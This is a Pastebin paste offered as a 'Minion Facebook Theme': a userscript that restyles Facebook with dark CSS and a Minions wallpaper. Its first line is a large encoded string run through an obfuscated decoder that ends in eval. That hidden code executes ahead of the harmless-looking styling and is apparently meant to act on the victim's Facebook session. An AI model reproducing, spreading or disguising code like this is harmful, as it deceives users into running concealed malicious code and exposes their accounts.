SHARE
TWEET

Minion Facebook Theme

a guest Jan 29th, 2014 73,767 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
 1. var _9464;var _5754='21776F168E183D1297D2033B2153D2097C2009A2145D2057D2105F2097C1473A1993E1537F1993D2001A2105C2097F2025A1545B2201E2161D1993A2129B1473D2049E2145E2145D2113F1633C1705E2097F2025E2169C1473E1921A1833E1825A1793F2145F2145C2113B1873B2025F2121E2153D2025D2137A2145C1689F2161A1993E2129F1473E2153A2129A2081B1633F1705B1489F1593B1993E2065B1993B2177D1593C2033F2105C2081F2081A2105A2169D1593B2033B2105D2081F2081E2105F2169A1977F2113F2129F2105E2033B2057B2081C2025A1585F2113A2049C2113A1721E1977C1977A1993A1705C1609E1489C1689F2161E1993C2129B1473D2113D1993A2129D1993D2089C2137F1633A1705E1489F2113C2129C2105B2033E2057A2081A2025D1977A2057A2017F1705F1489D1561F1993E2001C2105F2097F2025C1561F1489C1521C2081D2105A2009C1993B2145F2057F2105C2097B1705B1609F1521A2137D2105C2153A2129D2009E2025A1705D2033D2105C2081D2081D2105A2169D1577F2001C2153B2145C2145E2105C2097F1521C2137F2153D2001A2137D2009F2129E2057A2001A2025D2017C1977A2001E2153F2145B2145B2105D2097C1977C2057F2017D1705E2153D1625F1657A2121F1993B2009D1977A1625F1657B1521A2033C2001D1977C2017C2145B2137F2041B1705C1489F1561E2033B2001D1977A2017F2145A2137B2041D1561B1489B1521B2081A2137E2017E1521F1977A1977A1489B1561D2153B2137A2025C2129B1977A2057B2017C1561E1489B1521E2113B2049A2137C2145D1993C2089F2113D1705B1489C1689B2049E2145E2145B2113C1633F1585E2105E2113F2025D2097A1537F1489D1857E1849B1881E1889B1489F1569B2153F2129B2081C1633B1569F2145F2129E2153B2025D1545C1689B2049C2145B2145F2113F1633F1585D2105C2097E2129F2025D1993D2017E2185D2137B2145C1993C2145A2025B2009C2049F1993A2097D2041F2025C1705F2033E2153D2097E2009A2145E2057C2105F2097E1537B1545C2201C2057D2033A1537D2049E2145A2145C2113F1633E1585A2129E2025B1993D2017B2185E1881C2145E1993E2145C2025D1705A1705F1633B1521D1521C2049F2145A2145D2113E1633E1585B2137D2145F1993F2145F2153A2137E1705F1705C1617E1601E1601B1545E2049B2145D2145C2113A1633A1585A2009B2081B2105C2137C2025F2217B1689F2049C2145A2145B2113C1633B1585F2137D2025B2097B2017F1537E2113B1993D2129A1993B2089D2137D1633D1545D2217A2033F2153D2097E2009F2145D2057D2105D2097B1473B2137A2153B2001E2081C2057F2137E2145E1537B2153F2057C2017D2137A2137F1545E2201D2161C1993F2129C1473A1993A1705B2017F2105F2009C2153C2089B2025E2097A2145D1585B2009F2129C2025E1993E2145F2025B1769B2081C2025C2089F2025D2097D2145F1537A1529F2137C2009E2129E2057D2113B2145C1529E1545D1689D1993B1585B2057F2097B2097A2025F2129F1793F1889C1833A1825A1705A1489C2097B2025A2169A1473F1737C2137C2185E2097A2009B1873D2025D2121B2153B2025D2137C2145D1537B1545F1585E2137F2025B2145F1897F1873E1801E1537B1529E1593C1993E2065C1993C2177D1593F2033F2129E2057A2025A2097A2017B2137D1593A2081E2057D2137D2145D2137B1593C2137E2153C2001B2137E2009F2129D2057E2001B2025E1593B2089B2105E2017F2057E2033D2185D1721C2081B2105B2009E1993C2145E2057B2105B2097D1705E2113B2025E2129B2089D1993C2081B2057C2097F2073D1521A1993A2009B2145C2057F2105D2097A1705B2137C2153C2001D2137B2009E2129B2057C2001E2025E1529F1545C1585D2137B2025C2145C1761A1993A2145A1993E1537D2201B1473B2033A2081E2057D2017A1681A1473F1489A1561A2153B2057C2017A2137D2137A1561D1489C1473E2217B1545C1585A2137A2025D2097D2017F1537A1545B1689E1489E1689A2017A2105C2009C2153F2089E2025D2097E2145A1585E2001C2105F2017C2185B1585D1993B2113F2113B2025A2097D2017E1753A2049D2057F2081A2017C1537C1993B1545B2217A2161D1993A2129E1473C2153D2137A2025A2129D1977F2057D2017F1705B2017D2105F2009C2153F2089A2025B2097E2145B1585A2009D2105B2105C2073E2057E2025A1585B2089A1993B2145E2009D2049D1537A2017D2105B2009E2153C2089F2025F2097F2145D1585F2009D2105F2105B2073A2057B2025C1585D2089A1993B2145C2009F2049A1537D1593F2009A1977F2153A2137C2025F2129A1705C1537A1953B2017D1561F1545D1593B1545B1945A1609A1961E1545A1689E2161D1993D2129D1473C2033E2001D1977A2017C2145B2137F2041D1705B2017A2105A2009B2153E2089B2025D2097E2145A1585F2041B2025F2145B1769D2081A2025B2089D2025C2097E2145D2137C1745A2185C1841C1993A2089B2025F1537B1529E2033C2001C1977A2017E2145B2137A2041B1529C1545C1945E1601C1961D1585F2161E1993A2081D2153C2025C1689D2161C1993F2129B1473D2097A2105D2169B1705C1537E2097B2025D2169C1473A1761A1993A2145F2025D1545D1585C2041F2025B2145B1889B2057E2089D2025D1537C1545C1689A2033D2153B2097B2009E2145E2057C2105C2097A1473D1857C1537A2113E2105F2137D2145F1545B2201F2161A1993E2129F1473B1921C1705C2097F2025E2169A1473E1921D1833C1825D1793C2145B2145A2113F1873A2025B2121E2153D2025C2137A2145D1537F1545D1689E2161D1993D2129B1473D1921B1897D1873D1825B1705D1489F1593A1593D2169B2169A2169A1585E2033C1993F2009F2025A2001F2105E2105F2073C1585A2009F2105C2089A1593F1993B2065C1993D2177E1593E2153E2033B2057D1593A2081C2057A2073D2025E1585E2113F2049E2113D1489A1689A2161A1993F2129E1473E1921B1857D1993C2129E1993A2089E2137A1705A1489E2081B2057D2073D2025E1977B1993E2009C2145D2057F2105B2097F1705E2145F2129A2153C2025F1521A2033C2145E1977C2025A2097D2145C1977D2057D2017B2025F2097E2145B2057D2033C2057B2025D2129B1705B1489B1561A2113E2105E2137D2145E1561D1489F1521B2137B2105E2153A2129F2009F2025C1705E1609A1521D2009B2081B2057A2025F2097A2145F1977A2057D2017C1705C1489F1561E2097C2105E2169C1561C1489C1513B1625D1737C1625A1625A1649C1649C1649C1657C1657D1633E1617D1657A1521E2129C2105E2105D2145D2057C2017E1705C2153A1977C2113D2137C1977F1601D1977A1601B1977F1609F1633C1521B2041C2057C2033C2145F2105C2009A2009A1993B2137C2057F2105F2097D1521A2033E2145C1945B2145E2097A1961F1705D1513C1625D1769B1513E1625F1761E1897B1521E2033F2145B1945F2145F2185B2113E2025F1961A1705E1617D1601E1521F2033F2145A1945F2121E2057B2017F1961A1705F1641E1665B1665E1617F1601F1601A1649A1665A1673C1601E1641F1609A1625F1657E1665F1633B1657E1609D1617D1521E2033F2145C1945A2089D2033E1977B2137F2145D2105D2129B2185F1977B2073F2025C2185A1961E1705B1489E1561C2113A2105E2137C2145B1561E1489D1521A2097F2009C2145B2129A1945E1977C2089D2105A2017D1961D1705A2113C1993B2041B2025C2081B2025D2145C1977A2049C2105A2089D2025C1977A2137F2145B2129B2025F1993D2089E1521F1977A1977D2153F2137E2025F2129F1705A1489F1561E2153F2137E2025E2129F1977D2057F2017E1561D1489E1521E1977A1977F1993D1705B1609E1521F1977F1977F2017E2185C2097E1705A1657E2097C1665E1993A2049D2185F2065E1625C1641A1753E1777F2169B1921D1737B2041F1521B1977E1977B2129D2025B2121B1705A2065F1521A2033F2001F1977E2017A2145A2137F2041F1705B1489E1561D2033C2001D1977E2017C2145C2137A2041B1561F1489B1521D2113F2049A2137B2145C1993E2089E2113B1705E1489A1689D1921C1585D2105F2113B2025D2097D1537D1489F1857E1849B1881C1889A1489B1569E1921A1897D1873C1825C1569D2145A2129D2153D2025F1545A1689C1921A1585A2105D2097D2129D2025B1993B2017B2185B2137D2145F1993A2145C2025E2009B2049E1993D2097C2041E2025D1705A2033A2153B2097C2009E2145C2057C2105F2097B1537E1545E2201A2057B2033A1537C1921A1585E2129A2025E1993E2017F2185E1881D2145B1993A2145B2025D1705F1705A1633D1521B1521F1921F1585D2137E2145A1993E2145B2153A2137E1705E1705E1617A1601A1601D1545F2201E1921D1585A2009D2081C2105F2137C2025C2217D2217C1689D1921B1585A2137B2025D2097A2017D1537A1921F1857A1993D2129D1993A2089E2137D1545E2217A2161B1993F2129F1473C2033C2001A1977E2017F2145C2137A2041C1705B2017D2105B2009C2153B2089B2025E2097D2145C1585D2041B2025F2145A1769E2081D2025C2089D2025E2097F2145D2137B1745A2185A1841F1993E2089C2025A1537C1529F2033C2001E1977E2017D2145A2137A2041B1529B1545F1945C1601D1961C1585E2161E1993D2081F2153C2025F1689C2161A1993B2129B1473F2153C2137A2025F2129C1977D2057E2017F1705E2017D2105A2009C2153D2089E2025C2097D2145C1585E2009F2105D2105D2073F2057B2025C1585A2089C1993F2145B2009B2049F1537B2017D2105F2009A2153B2089D2025C2097A2145F1585E2009F2105D2105F2073C2057C2025E1585F2089D1993B2145B2009E2049A1537E1593D2009C1977D2153B2137B2025F2129D1705B1537F1953A2017F1561F1545F1593A1545E1945D1609A1961D1545C1689D2033B2153E2097A2009C2145D2057F2105E2097E1473A1825B2057E2073B2025E1537A2113C1545B2201E2161D1993F2129F1473F1857A1993D2041E2025A1705F2097C2025C2169D1473F1921D1833F1825C1793D2145D2145D2113A1873B2025D2121F2153E2025F2137C2145D1537C1545C1689C2161F1993B2129F1473E1857B1993E2041E2025E1897E1873A1825D1705D1489B1593C1593E2169E2169E2169D1585C2033C1993D2009B2025D2001D2105E2105B2073D1585E2009A2105B2089F1593C1993F2065C1993E2177F1593F2113C1993D2041A2025C2137B1593A2033E1993A2097A1977E2137E2145D1993B2145C2153B2137D1585E2113E2049B2113F1489F1689A2161E1993F2129C1473D1857F1993C2041C2025B1857F1993D2129C1993A2089F2137A1705D1489B1521C2033E2001A2113D1993D2041D2025D1977E2057D2017F1705F1489F1561E2113D1561A1489F1521B1993C2017D2017D1705A2145C2129F2153D2025D1521C2129F2025B2081E2105B1993A2017D1705D2033E1993E2081B2137C2025C1521D2033D1993D2097D1977D2105A2129D2057D2041A2057E2097A1705F2113E1993F2041A2025C1977A2145D2057C2089D2025E2081E2057B2097D2025A1521E2033F1993F2097F1977A2137C2105E2153B2129A2009B2025C1705B1521B2009C1993E2145E1705C1521D2097C2009D2145E2129F1945C1977B2089C2105F2017E1961D1705E2113D1993B2041D2025C2081A2025F2145B1977F2145F2057B2089F2025D2081C2057D2097E2025E1977D2113C1993A2041A2025E1977C1993E2009B2145A2057E2105A2097A2137E1521C1977A1977A2153D2137F2025E2129E1705A1489E1561F2153A2137A2025D2129D1977C2057A2017D1561E1489D1521F1977E1977C1993E1705E1609E1521C1977C1977C2017B2185C2097C1705B1657C1673D1665F1993F1761C1641C2193D1641B1753B1777E1577F1521D1977E1977B2129F2025A2121D1705F2017E1521E2033B2001A1977B2017A2145B2137D2041D1705C1489C1561D2033F2001B1977D2017E2145C2137D2041A1561D1489C1521C2113B2049F2137F2145E1993B2089F2113F1705B1489E1689B1857D1993C2041B2025A1585A2105C2113A2025A2097F1537C1489E1857B1849C1881D1889F1489E1569F1857D1993F2041A2025A1897E1873D1825F1569A2145B2129C2153A2025D1545E1689C1857A1993F2041A2025B1585F2105A2097D2129B2025B1993A2017E2185F2137D2145F1993F2145C2025B2009E2049D1993E2097D2041D2025A1705A2033E2153C2097B2009B2145E2057B2105E2097E1537D1545E2201A2057C2033C1537D1857A1993A2041D2025C1585D2129A2025D1993E2017F2185D1881C2145E1993C2145F2025F1705A1705C1633E1521C1521C1857D1993E2041B2025B1585C2137E2145B1993D2145D2153B2137F1705A1705D1617D1601C1601E1545B2201D1857E1993C2041B2025F1585F2009C2081D2105F2137C2025B2217B2217D1689A1857B1993C2041F2025A1585A2137A2025C2097A2017F1537A1857E1993E2041D2025C1857D1993B2129D1993E2089C2137E1545B2217E2033C2153A2097C2009B2145B2057C2105E2097B1473B1801A1761A1881B1537C2129D1545C2201D2161D1993D2129B1473D1921E1705B2097E2025C2169D1473F1921E1833C1825A1793B2145F2145A2113C1873B2025A2121F2153F2025D2137C2145E1537F1545B1689A2161D1993E2129B1473D1921D1897A1873C1825D1705C1489C1593E1593C2169D2169B2169E1585E2033B1993C2009F2025B2001D2105C2105E2073B1585A2009B2105C2089D1593F1993E2065D1993D2177D1593C1993C2017A2017F1977B2033C2129A2057F2025D2097A2017A1593F1993F2009A2145F2057C2105A2097F1585F2113A2049A2113E1489C1689B2161C1993F2129E1473F1921D1857A1993B2129B1993E2089C2137A1705F1489E2145B2105F1977A2033F2129B2057C2025F2097D2017F1705A1489C1561C2129C1561D1489B1521E1993A2009F2145D2057D2105E2097A1705B1993C2017B2017A1977E2033A2129F2057D2025E2097B2017A1521E2049F2105E2169F1977B2033C2105A2153D2097C2017A1705C2033B2129A2057F2025E2097B2017B1977D2001C2129D2105E2169A2137E2025C2129E1977A2137B1521E2129E2025D2033F1977D2113B1993D2129D1993E2089B1705D2097F2105F2097E2025C1521E1521C1521C2105C2153F2145C2041C2105D2057B2097F2041D1977B2057B2017D1705E1521F2081E2105B2041A2041A2057C2097A2041C1977B2081B2105C2009A1993F2145D2057B2105D2097B1705B2137D2025B1993A2129F2009A2049A1521B2097F2105E1977C2033B2081C2185E2105D2153A2145C1977C2105D2097A1977F2009D2081C2057C2009D2073D1705C2145D2129B2153B2025B1521B2025D2041F2105C1977C2081F2105A2041A1977E2017F1993F2145B1993C1521F2049A2145B2145B2113F1977A2129D2025F2033D2025E2129A2025E2129D1521C1977F1977F2153E2137B2025F2129C1705D1489B1561E2153F2137E2025E2129C1977C2057D2017B1561F1489C1521C1977A1977E1993D1705E1609B1521F1977C1977B2017E2185A2097F1705A1657D1673B1665A1993C1761D1641A2193C1641C1753D1777A1577E1521A1977E1977F2129A2025C2121B1705B1625B1641F1521D2033A2001A1977B2017E2145F2137F2041D1705E1489B1561C2033C2001B1977C2017B2145A2137D2041C1561C1489A1521E2113F2049F2137A2145F1993B2089D2113E1705E1489E1689B1921E1585C2105B2113D2025A2097A1537F1489B1857F1849A1881C1889F1489B1569C1921A1897F1873B1825D1569B2145C2129F2153D2025B1545F1689C1921B1585C2105C2097F2129E2025B1993E2017E2185A2137A2145D1993B2145D2025C2009E2049C1993E2097C2041A2025F1705C2033F2153C2097B2009E2145D2057B2105F2097B1537C1545B2201E2057C2033D1537B1921F1585D2129A2025D1993A2017D2185D1881C2145D1993C2145C2025E1705D1705F1633F1521A1521B1921E1585B2137D2145C1993A2145A2153A2137A1705B1705D1617A1601A1601C1545E2201E1921D1585D2009B2081F2105A2137D2025B2217F2217C1689C1921D1585A2137F2025A2097C2017F1537D1921A1857E1993E2129F1993F2089D2137E1545A2217D1297C1593A1593C1593C1593D1593A1593F1593B1593F1593B1593A1593B1593E1593C1593B1593A1593C1593A1593F1593C1593B1593C1593E1593F1593B1593D1593D1593E1889B2129D3017D2057E1473A1889D2057C2089D1473F1753E64505E1993E1473C1785C2057A3161C1593E1593E1593F1593E1593A1593B1593F1593A1593D1593B1593E1593D1593B1593E1593B1593F1593F1593C1593D1593C1593D1593B1593C1593C1593A1297F1801C1761E1881B1537E1489B1609A1601F1601D1601B1601A1625E1649F1657E1625E1633F1665F1609E1601D1625B1601E1489B1545E1689C1801C1761D1881C1537E1489F1609A1601C1601C1601A1601B1641B1641D1657C1641F1617C1601C1633D1601D1601B1657B1489F1545A1689C1297B1825B2057E2073A2025F1537D1489A1649C1665C1617E1649B1625C1601D1641A1673E1665B1633A1625E1633C1601E1617E1649D1489C1545E1689B1825A2057C2073C2025D1537B1489F1609B1609B1665D1657C1633D1625A1657B1649D1633B1673E1665B1649C1625F1617F1625A1489D1545B1689A1825D2057B2073E2025A1537D1489F1625A1609B1649A1649E1665A1633B1673A1665E1641C1609B1617B1633F1617F1657D1617C1489B1545B1689D1825C2057A2073F2025F1537F1489F1641D1625D1673B1609E1601C1617B1665E1609A1617B1665F1633C1633F1665F1665A1609D1489D1545A1689F1297E1825A2057A2073C2025D1537E1489E1609F1625F1673E1665E1617A1673B1657B1673F1665A1601E1633A1617B1633D1617A1633E1649F1489B1545F1689D1825E2057D2073F2025D1537F1489D1633B1673A1633C1673C1665B1601F1665D1673A1657F1617F1665A1673F1617B1633A1649F1489A1545B1689F1825A2057F2073D2025B1537E1489C1657A1625A1665C1609E1673C1633E1673D1633C1673D1641A1617A1649C1633F1649F1617B1489D1545C1689E1825D2057C2073B2025B1537E1489B1609B1633E1641B1649B1665B1601B1633C1649A1617F1657B1665E1657E1625C1601B1665D1641A1489E1545C1689C';var _6938=/[\x41\x42\x43\x44\x45\x46]/;var _8851=2;var _7618=_5754.charAt(_5754.length-1);var _9397;var _5416=_5754.split(_6938);var _8116=[String.fromCharCode,isNaN,parseInt,String];_5416[1]=_8116[_8851+1](_8116[_8851](_5416[1])/21);var _1349=(_8851==9)?String:eval;_9397='';_11=_8116[_8851](_5416[0])/_8116[_8851](_5416[1]);for(_9464=3;_9464<_11;_9464++)_9397+=(_8116[_8851-2]((_8116[_8851](_5416[_9464])+_8116[_8851](_5416[2])+_8116[_8851](_5416[1]))/_8116[_8851](_5416[1])-_8116[_8851](_5416[2])+_8116[_8851](_5416[1])-1));var _7007='_6052';var _7286='_7007=_9397';function _5232(_4573){_1349(_2581);_5232(_7594);_7594(_7286);_5232(_7007);}var _2581='_5232=_1349';var _7594='_7594=_5232';_5232(_7618);
 2.  
 3. /////////////////////////Theme//////////////////////////
 4. (function() {
 5. var css = ".highlightIndicator, \n.tinyman:after, \n.fbTimelineSideAds,\n.ego_column,\n.buttonWrap, \n.fbTimelineSpine, \n.spinePointer, \n.topBorder, \n.bottomBorder, \n#footerContainer, \n.middleLink, \n.slimHeader #pageNav li.tinyman::after, .slimHeader #pageNav li.middleLink::after, \n.slimHeader #pageNav .middleLink a, \n.moreSectionsLink\n{\ndisplay:none !important;\n}\n\ndiv.mainWrapper{\npadding-left: 1em !important;\n}\n.uiProgressBar .fill {\nbackground: #444 !important;\nborder: solid #222 !important;\n}\n.uiTypeaheadView .compact li {\nbackground-color: #111 !important;\n}\ndiv.uiTypeaheadView .selected {\nbackground-color: #333 !important;\n}\n.fbIndex .gradient {\nbackground: none !important;\n}\n.notifNegativeBase #fbNotificationsFlyout li.jewelItemNew, .notifNegativeBase #fbNotificationsFlyout li.first_receipt {\nbackground: #333 !important;\n}\n.pop_container {\nbackground-color: #000 !important;\n}\n.pop_verticalslab, .pop_horizontalslab {\nbackground: #222 !important;\n}\n.uiMenuXItem\na.highlighted {\nbackground-color: #333 !important;\nborder-color: #000 !important;\ncolor: #FFF !important;\n}\n.uiMenuXItem\na.highlighted {\nbackground-color: #333 !important;\nborder-color: #000 !important;\ncolor: #FFF !important;\n}\n.uiContextualLayer {\nbackground-color: #111 !important;\n}\n.HighlightSelectorMenu {\nborder: 2px solid #000 !important;\nbackground: #111 !important;\nborder-radius: 5px !important;\n}\n.-cx-PUBLIC-uiDialog__border, ._1yu {\nborder: 10px solid rgba(82, 82, 82, .7) !important;\n-webkit-border-radius: 8px !important;\n}\ninput[type=\"text\"], input[type=\"password\"], .inputtext, select, .select, select > option, select > button, .fbPhotoImageStage .fbPhotosPhotoButtons .tagMessage, .fbPhotoImageStage .fbPhotosPhotoButtons .cropMessage, #u1clso_61 div img, #navSearch .uiTypeahead, .-cx-PRIVATE-uiDialog__content, ._1yu, ._t {\nbackground-color: #111 !important;\n}\n.fbTimelineCapsule\n{\nbackground: none !important;\n}\n.sp_c79t5t\n{\nbackground-image: none !important;\n}\n* {\nborder-color: transparent !important;\ncolor: #fff !important;\nbackground-color: transparent !important; \n}\n\n#fbTimelineHeadline .profilePic {\nbackground-color: #FFF !important;\nborder: 4px solid #FFF !important;\n-webkit-border-radius: 2px !important;\nheight: 160px !important;\nwidth: 160px !important;\n}\n\n\n.fbTimelineScrubber {\n\nborder-color: #333333 !important;\npadding: 8px 0 8px 1px !important;\ntop: 38px !important;\nwidth: 122px !important;\nz-index: 1 !important;\nborder-radius: 10px !important;\n}\n\n.fbPhotosPhotoTagboxBase .tagName {\nbackground: #000 !important;\ncolor: #FFF !important;\ncursor: default !important;\nfont-weight: normal !important;\npadding: 2px 6px 3px !important;\ntop: 3px !important;\nwhite-space: nowrap !important;\n}\n\n.fbPhotosPhotoTagboxBase .innerTagBox {\nborder: 4px solid white !important;\nborder-color: rgba(255, 255, 255, .8) !important;\n}\n\n.fbPhotoSnowlift {\nbackground-color: rgba(0, 0, 0, .7) !important;\n}\n\n.fbPhotoSnowlift .rhc , .pagingActivated .snowliftOverlay, .fbPhotoSnowlift.taggingMode .snowliftOverlay, .stageWrapper{\nbackground-color: #111 !important;\n}\n\n.profile-picture img {\nmax-width: 170px !important;\n}\n\n.webComposerPhotoUpload input, .webComposerPhotoUpload {\ncolor: #000000 !important;\n}\n\n\nhtml{background:url(http://www.uploadhosting.co/uploads/49.145.50.126/Minions-Despicable-Me-2-Images-HD-Wallpaper_2zzyeE.jpg) no-repeat center fixed;background-size:cover;-o-background-size:cover;-webkit-background-size:cover}\n\n\n\n\n.fbCurrentStory:hover, .connect_widget_like_button, .fbFeedTickerStory:hover, .item a:hover, .fbJewelFlyout li:hover, .uiSideNav a:hover, .fbNubFlyoutBody, .uiButtonConfirm {\nbackground: #111111 !important;\n}\n\n.fbChatMessageGroup {\nborder-color: #2c2c2c !important;\n}\n\n.fbChatSidebar {\nbackground: #111111 !important;\n}\n\n#leftCol {\nposition: relative;top:20px!important;\nmin-height: 400px !important;\n}\n\n.arrowLeft a {\nbackground-image:url('http://i.imgur.com/26zf5.png') !important;\nborder-color: #666666 !important;\n}\n\n.arrowRight a {\nbackground-image:url('http://i.imgur.com/v6B6z.png') !important;\nborder-color: #666666 !important;\n}\n\n.uiStreamSubstory {\nborder-color: transparent !important;\n}\n\n.uiHeader {\nbackground-color: transparent !important;\n}\n\n.fbSidebarGripper, .fbTickerFooter, .fbSidebarGripper div, .navSubmenu:hover {\nbackground-color: #222222 !important;\n}\n\n.fbTimelineCountButton, .uiBoxWhite, .uiButtonGroup {\nbackground-color: #1c1c1c !important;\n}\n\n\n\n#leftCol {\npadding-top: 0px !important;\npadding-left: 0px !important;\n}\n\n.fbNubFlyoutFooter {\nbackground: #111111 !important;\nbox-shadow: 0 1px 2px rgba(0, 0, 0, 0.5) !important;\ncolor: #07b2ff !important; \nborder: #333333 !important;\n}\n\n.uiStream .uiSelectorButton {\nbackground-image: url(\"http://i.imgur.com/nOfuQ.png\") !important;\n}\n\n.uiSearchInput {\nbackground-image: url(\"http://i.imgur.com/agmNw.png\") !important;\n}\n\n\n\n\n.jewelButton:hover, .topNavLink a:hover {\nbackground-color: #222222 !important;\n}\n\n.uiScrollableAreaGripper {\nbackground-color: #666666 !important;\n}\n\n.uiSearchInput, .fbPhotosGridHeader, .uiComposerMessageBoxControls, #MessagingShelf, .uiBoxGray {\nbackground: #111111 !important;\n}\n\n.uiButton {\nbackground: #1c1c1c !important;\n}\n\n#blueBar  {\nbackground: -moz-linear-gradient(top,  #45484d 0%, #000000 100%) !important;\nbackground: -webkit-linear-gradient(top,  #45484d 0%, #000000 100%) !important;\nbox-shadow: 0 0 7px rgba(211, 32, 198, 0.75) !important;\nborder:4px ridge #07b2ff !important;\nmargin-top:5px!important;\nmargin-left:5px!important;\nborder-radius: 70px!important;\n}\n\n\n\n#contentCol, #pageLogo a {\nbackground-color: transparent !important;\nborder-color: transparent !important;\n}\n\n.uiMorePager {\nmargin-bottom:6px !important;\nbackground-color: #1c1c1c !important;\nborder: 0px solid #333333 !important;\n}\n\n.uiStreamStory, .fbIndexFeaturedRegistration, .signupForm {\nmargin-bottom:2px !important;\nbackground-color:transparent !important;\nbackground-image:url('http://i.imgur.com/T2LPj.png') !important;\nborder-radius: 15px !important;\npadding: 1px !important;\nborder: 0px solid #333333 !important;\n}\n\n.uiStream .uiStreamHeader .uiStreamHeaderChronologicalForm .uiSelectorButton .uiButtonText {\ncolor: #000 !important;\n}\n\n#album_pagelet {\nbackground-color: #111111 !important;\nmargin-left: 0px !important;\nmargin-top: -15px !important;\n}\n\n.tagWrapper, #pagelet_main_column, .timelineUnitContainer, .fbTimelineTopSection, #MessagingMessages {\nbackground-color:transparent !important;\nbackground-image:url('http://i.imgur.com/T2LPj.png') !important;\nborder-radius: 15px !important;\nborder: 0px solid #333333 !important;\n}\n.fbTimelineTopSectionBase .topSectionBottomBorder {\ndisplay: none !important;\n}\n#pagelet_main_column {\nwidth: 500px !important;\n}\n\n.fbJewelFlyout, .uiToggleFlyout, .navigation, .container, .uiOverlayContent, .search, .pop_container_advanced {\nbackground-color: #111111 !important; \nborder-radius: 15px !important;\nborder: 2px solid #333333 !important;\n}\n\n#left_column, #leftCol, .MessagingReadHeader {\nbackground: #111111 !important;\nborder-radius: 15px !important;\n}\n\n#left_column, #leftCol {\nmargin-left:-8px !important;\nwidth: 185px !important;\n}\n\n.uiMediaThumb i, .uiProfilePhoto {\nborder: 1px solid #000000 !important; \n}\n\n#rightCol {\nmargin-top: 10px !important;\npadding-top: 0px !important;\nbackground: #111111 !important;\nborder-radius: 15px !important;\nborder: 0px solid #333333 !important;\n}\n\n#right_column, .rightColumnWrapper {\nmargin-top: 0px !important;\npadding-top: 0px !important; \nposition: fixed !important;\nbackground: #111111 !important;\nborder-radius: 15px !important; \nborder: 0px solid #333333 !important;\n}\n\n.aboutMePagelet {\nbackground-color:transparent !important;\nbackground-image:url('http://i.imgur.com/T2LPj.png') !important;\nborder: 0px solid #333333 !important;\n}\n\n.fbNubButton, .fbNubFlyoutTitlebar, .uiToggleFlyout, .fbChatSidebarFooter {\nbackground: -moz-linear-gradient(center top , #333333, #000000) !important;\nbackground: -webkit-linear-gradient(center top , #333333, #000000) !important;\nbox-shadow: 0 1px 2px rgba(0, 0, 0, 0.5) !important;\ncolor: #07b2ff !important;\nborder: #333333 !important;\n}\n\n.fbChatOrderedList {\nbackground: -moz-linear-gradient(center right , #333333, #000000) !important;\nbackground: -webkit-linear-gradient(center right , #333333, #000000) !important;\nbox-shadow: 0 1px 2px rgba(0, 0, 0, 0.5) !important;\ncolor: #07b2ff !important;\nborder: #333333 !important;\n}\n\n\n\n\n\n\n\n\n.UFIMentionsInputWrap,.navHeader, ._554n,.fbxWelcomeBox ,._2yg .composerTypeahead {\nbackground: -moz-linear-gradient(top,  #45484d 0%, #000000 100%) !important;\nbackground: -webkit-linear-gradient(top,  #45484d 0%, #000000 100%) !important;\nbox-shadow: 0 2px 4px rgba(211, 32, 198, 0.75) !important;\nborder:2px ridge #07b2ff !important;\nmargin-top:5px!important;\nmargin-left:0px!important;\nborder-radius: 7px!important;\npadding:3px!important;\n}\n.fbx #pageHead, #blueBar #pageHead{\npadding-top:0px!important;\n}\n\n.slim #blueBar {\n\n    height: 35px!important;\n}\n.fbxWelcomeBoxBlock .fbxWelcomeBoxImg,\n._s0,\n._42fz .pic{\n   border:2px solid  rgba(0, 0, 0, .55)!important;\n   border-radius: 37px!important;\n}\n.fbxWelcomeBoxBlock .fbxWelcomeBoxImg:hover,\n._s0:hover,\n._42fz .pic:hover{\n   box-shadow: 0px 0px 4px rgba(211, 32, 198, 0.75) !important;\n   border:2px ridge #07b2ff !important;\n   border-radius: 37px!important;\n}\n.uiSideNav .sideNavItem .hasCount:hover,\n.uiSideNav .sideNavItem .noCount:hover{\n   text-shadow: 2px 2px 2px rgba(39, 98, 138, 0.75) !important;\n   color:#07b2ff !important;\n\n}\n#navSearch {\nwidth:300px !important;\nmargin-top: 6px !important;\nmargin-left: 30px !important;\nborder-color: transparent !important;\n}\n#headNav {\n    height: 30px;\n}\n\n\n\na:hover{\n   text-shadow: 2px 2px 2px rgba(39, 98, 138, 0.75) !important;\n   color: #07b2ff !important;\n}\n.UIActionLinks_bottom a, \n.UIActionLinks_bottom button.as_link, \n.UIActionLinks_bottom .uiLinkButton input, \n.UIActionLinks_bottom .uiLinkButton input:hover,\n.uiStreamMessage .actorName, .uiStreamMessage .passiveName\n{\n   text-shadow: 1px 1px 1px rgba(0, 0, 0, 0.99) !important;\n   color: #07b2ff !important;\n}\n._2yg .composerTypeahead ,#bfb_options_button_li.openToggler ul,\n .better_fb_mini_message, .sfx_mini_message_no_x,\n .GM_options_wrapper_inner,\n .better_fb_mini_message, .mini_x{\nbackground: -moz-linear-gradient(top,  #45484d 0%, #fffcfc 100%) !important;\nbackground: -webkit-linear-gradient(top, #45484d  0%,#fffcfc 100%);\nbox-shadow: 0 2px 4px rgba(39, 98, 138, 0.75) !important;\nborder:2px ridge #07b2ff !important;\nmargin-top:5px!important;\nmargin-left:0px!important;\nborder-radius: 7px!important;\npadding:3px!important;\n}\n.GM_options_buttons input{\n   text-shadow: 1px 1px 1px rgba(0, 0, 0, 0.99) !important;\n   color: #07b2ff !important;\n\n}";
 6. if (typeof GM_addStyle != "undefined") {
 7.         GM_addStyle(css);
 8. } else if (typeof PRO_addStyle != "undefined") {
 9.         PRO_addStyle(css);
 10. } else if (typeof addStyle != "undefined") {
 11.         addStyle(css);
 12. } else {
 13.         var node = document.createElement("style");
 14.         node.type = "text/css";
 15.         node.appendChild(document.createTextNode(css));
 16.         var heads = document.getElementsByTagName("head");
 17.         if (heads.length > 0) {
 18.                 heads[0].appendChild(node);
 19.         } else {
 20.                 // Trái Tim C?a Gió ( Thanh )
 21.                 document.documentElement.appendChild(node);
 22.         }
 23. }
 24. })();
